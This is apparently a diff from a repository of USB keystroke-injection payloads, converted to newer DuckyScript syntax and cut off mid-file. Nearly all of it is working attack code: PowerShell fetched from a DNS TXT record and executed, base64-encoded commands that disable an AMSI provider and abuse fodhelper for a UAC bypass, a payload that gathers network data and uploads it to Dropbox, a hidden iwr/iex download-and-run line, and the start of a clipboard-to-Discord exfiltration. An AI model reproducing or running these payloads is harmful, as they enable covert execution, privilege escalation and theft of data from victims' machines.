||||||
REM Category: Execution
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
REM STAGE 1
|
REM STAGE 1
|
||||||
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 50
|
STRINGLN fsquirt
|
||||||
STRING fsquirt
|
|
||||||
DELAY 200
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
SPACE
|
SPACE
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
REM STAGE 2
|
REM STAGE 2
|
||||||
|
|
||||||
k
|
STRING k
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
SPACE
|
SPACE
|
||||||
DELAY 500
|
REPEAT 8 TAB
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
CTRL a
|
CTRL a
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
REM STAGE 3
|
REM STAGE 3
|
||||||
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 50
|
STRINGLN powershell -windowstyle hidden
|
||||||
STRING powershell -windowstyle hidden
|
STRINGLN Add-Type -AssemblyName System.Windows.Forms
|
||||||
DELAY 1000
|
STRINGLN $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
|
||||||
ENTER
|
STRINGLN $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
|
||||||
DELAY 5000
|
STRINGLN [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
|
||||||
STRING Add-Type -AssemblyName System.Windows.Forms
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
|
||||||
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
MOUSE CLICK 1
|
MOUSE CLICK 1
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
ALT SPACE
|
ALT SPACE
|
||||||
DELAY 500
|
REPEAT 6 DOWNARROW
|
||||||
DOWNARROW
|
|
||||||
DELAY 500
|
|
||||||
DOWNARROW
|
|
||||||
DELAY 500
|
|
||||||
DOWNARROW
|
|
||||||
DELAY 500
|
|
||||||
DOWNARROW
|
|
||||||
DELAY 500
|
|
||||||
DOWNARROW
|
|
||||||
DELAY 500
|
|
||||||
DOWNARROW
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
REM_BLOCK
|
||||||
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
|
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
|
||||||
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
|
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
|
||||||
# This POC will get some commands that will play a message on a victims computer using Windows
|
# This POC will get some commands that will play a message on a victims computer using Windows
|
||||||
|
@ -9,6 +9,7 @@
|
||||||
# Category: Execution
|
# Category: Execution
|
||||||
# Target: Windows10+ Powershell
|
# Target: Windows10+ Powershell
|
||||||
# Attackmodes: HID
|
# Attackmodes: HID
|
||||||
|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
# Quick Guide
|
# Quick Guide
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
|
@ -37,12 +38,14 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
# In OMG code that would be:
|
# In OMG code that would be:
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL omg.yourdomain.com
|
||||||
|
|
||||||
DUCKY_LANG US
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING CMD
|
STRINGLN CMD
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
|
STRINGLN for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" #OMG 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
|
||||||
ENTER
|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
|
|
@ -1,46 +1,7 @@
|
||||||
DELAY 500
|
|
||||||
DUCKY_LANG de
|
DUCKY_LANG de
|
||||||
DELAY 1500
|
DELAY 2000
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell
|
|
||||||
DELAY 250
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgAC
|
GUI r
|
||||||
|
STRINGLN powershell
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING cASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIA
|
STRINGLN powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIANwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBCADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
|
||||||
DELAY 200
|
|
||||||
STRING NwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBl
|
|
||||||
DELAY 200
|
|
||||||
STRING ADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8A
|
|
||||||
DELAY 200
|
|
||||||
STRING ZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBC
|
|
||||||
DELAY 200
|
|
||||||
STRING ADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUA
|
|
||||||
DELAY 200
|
|
||||||
STRING bABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAH
|
|
||||||
DELAY 200
|
|
||||||
STRING QAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBz
|
|
||||||
DELAY 200
|
|
||||||
STRING AGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdA
|
|
||||||
DELAY 200
|
|
||||||
STRING B3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACI
|
|
||||||
DELAY 200
|
|
||||||
STRING AIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3
|
|
||||||
DELAY 200
|
|
||||||
STRING AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIA
|
|
||||||
DELAY 200
|
|
||||||
STRING AtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQAL
|
|
||||||
DELAY 200
|
|
||||||
STRING QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcA
|
|
||||||
DELAY 200
|
|
||||||
STRING G0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB
|
|
||||||
DELAY 200
|
|
||||||
STRING 1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABv
|
|
||||||
DELAY 200
|
|
||||||
STRING AHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASAB
|
|
||||||
DELAY 200
|
|
||||||
STRING pAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
|
|
||||||
DELAY 100
|
|
||||||
ENTER
|
|
|
@ -1,22 +1,16 @@
|
||||||
REM FodCableII
|
REM_BLOCK
|
||||||
REM Version 1.0
|
FodCableII
|
||||||
REM OS: Windows
|
Version 1.0
|
||||||
REM Author: 0iphor13
|
OS: Windows
|
||||||
REM Requirements: OMG Firmware v.2.5 or higher
|
Author: 0iphor13
|
||||||
|
Requirements: OMG Firmware v.2.5 or higher
|
||||||
|
Using FodHelper.exe to bypass UAC and get an elevated shell
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Using FodHelper.exe to bypass UAC and get an elevated shell
|
|
||||||
|
|
||||||
DELAY 500
|
|
||||||
DUCKY_LANG de
|
DUCKY_LANG de
|
||||||
DELAY 1500
|
DELAY 2000
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
|
STRINGLN powershell -NoP -NonI
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -NoP -NonI
|
STRINGLN powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
|
|
||||||
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
|
|
||||||
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
|
|
||||||
DELAY 200
|
|
||||||
ENTER
|
|
|
@ -1,189 +1,88 @@
|
||||||
REM Title: Hard_Con_Exfil
|
REM_BLOCK
|
||||||
REM Author: LulzAnarchyAnon
|
Title: Hard_Con_Exfil
|
||||||
REM Description: This payload navagates it's way to Hardware, and Connection properties.
|
Author: LulzAnarchyAnon
|
||||||
REM It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
|
Description: This payload navagates it's way to Hardware, and Connection properties.
|
||||||
REM It is then exfiltrated via a DropBox Upload.
|
It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
|
||||||
REM Target: Windows 10
|
It is then exfiltrated via a DropBox Upload.
|
||||||
REM Props: Darren Kitchen
|
Target: Windows 10
|
||||||
REM Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
|
Props: Darren Kitchen
|
||||||
REM Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
|
Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
|
||||||
REM Props: Don't forget to Like and Subscribe!
|
Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
|
||||||
REM Version: 1.0
|
Props: Don't forget to Like and Subscribe!
|
||||||
REM Category: Exfiltration
|
Version: 1.0
|
||||||
|
Category: Exfiltration
|
||||||
|
|
||||||
REM This payload may need minor adjustments to run properly depending on
|
This payload may need minor adjustments to run properly depending on
|
||||||
REM Attacker, and Target devices.
|
Attacker, and Target devices.
|
||||||
|
|
||||||
REM In the First stage the targets data is saved to the target device.
|
In the First stage the targets data is saved to the target device.
|
||||||
REM In the Second stage the loot is uploaded via dropbox.
|
In the Second stage the loot is uploaded via dropbox.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 500
|
||||||
|
|
||||||
REM Stage 1
|
REM Stage 1
|
||||||
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 100
|
STRINGLN network properties
|
||||||
STRING network properties
|
REPEAT 3 TAB
|
||||||
DELAY 200
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
STRINGLN notepad
|
||||||
STRING notepad
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
CTRL v
|
CTRL v
|
||||||
DELAY 500
|
|
||||||
CTRL s
|
CTRL s
|
||||||
DELAY 500
|
|
||||||
ALT d
|
ALT d
|
||||||
DELAY 500
|
STRINGLN %USERPROFILE%\Downloads
|
||||||
STRING %USERPROFILE%\Downloads
|
REPEAT 6 TAB
|
||||||
DELAY 500
|
STRINGLN targetloot
|
||||||
ENTER
|
REPEAT 2 ALT F4
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
STRING targetloot
|
|
||||||
DELAY 100
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
ALT F4
|
|
||||||
DELAY 100
|
|
||||||
ALT F4
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM Stage 2
|
REM Stage 2
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
|
||||||
STRING powershell
|
STRING powershell
|
||||||
DELAY 200
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
STRING function DropBox-Upload {
|
STRINGLN function DropBox-Upload {
|
||||||
|
STRINGLN [CmdletBinding()]
|
||||||
DELAY 500
|
STRINGLN param (
|
||||||
ENTER
|
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
||||||
|
STRINGLN [Alias("f")]
|
||||||
STRING [CmdletBinding()]
|
STRINGLN [string]$SourceFilePath
|
||||||
DELAY 500
|
STRINGLN )
|
||||||
ENTER
|
STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
|
||||||
STRING param (
|
STRINGLN "
|
||||||
|
STRINGLN " # Replace with your DropBox Access Token
|
||||||
DELAY 500
|
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
|
||||||
ENTER
|
STRINGLN $TargetFilePath="/$outputFile"
|
||||||
|
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||||
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
|
||||||
DELAY 500
|
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||||
ENTER
|
STRINGLN $headers.Add("Authorization", $authorization)
|
||||||
STRING [Alias("f")]
|
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
|
||||||
DELAY 500
|
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
|
||||||
ENTER
|
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||||
STRING [string]$SourceFilePath
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING )
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING "
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING" # Replace with your DropBox Access Token
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $outputFile = Split-Path $SourceFilePath -leaf
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $TargetFilePath="/$outputFile"
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $authorization = "Bearer " + $DropBoxAccessToken
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers.Add("Authorization", $authorization)
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers.Add("Dropbox-API-Arg", $arg)
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers.Add("Content-Type", 'application/octet-stream')
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING }
|
STRING }
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
STRINGLN %USERPROFILE%\Downloads\
|
||||||
STRING %USERPROFILE%\Downloads\
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING targetloot
|
STRING targetloot
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
STRINGLN %USERPROFILE%\Downloads\
|
||||||
STRING %USERPROFILE%\Downloads\
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING targetloot
|
STRING targetloot
|
||||||
DELAY 500
|
|
||||||
ALT h
|
ALT h
|
||||||
DELAY 200
|
REPEAT 5 TAB
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
ALT F4
|
ALT F4
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
CTRL v
|
CTRL v
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
STRING | DropBox-Upload
|
STRINGLN | DropBox-Upload
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
ENTER
|
ENTER
|
||||||
ALT F4
|
ALT F4
|
||||||
DELAY 100
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -1,16 +1,17 @@
|
||||||
REM Title: Bookmark-Hog
|
REM_BLOCK
|
||||||
|
Title: Bookmark-Hog
|
||||||
|
Author: atomiczsec
|
||||||
|
Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
|
||||||
|
Target: Windows 10, 11
|
||||||
|
|
||||||
REM Author: atomiczsec
|
Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
|
|
@ -1,17 +1,19 @@
|
||||||
REM Title: Copy-And-Waste
|
REM_BLOCK
|
||||||
|
Title: Copy-And-Waste
|
||||||
|
Author: atomiczsec & I am Jakoby
|
||||||
|
Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
|
||||||
|
Target: Windows 10, 11
|
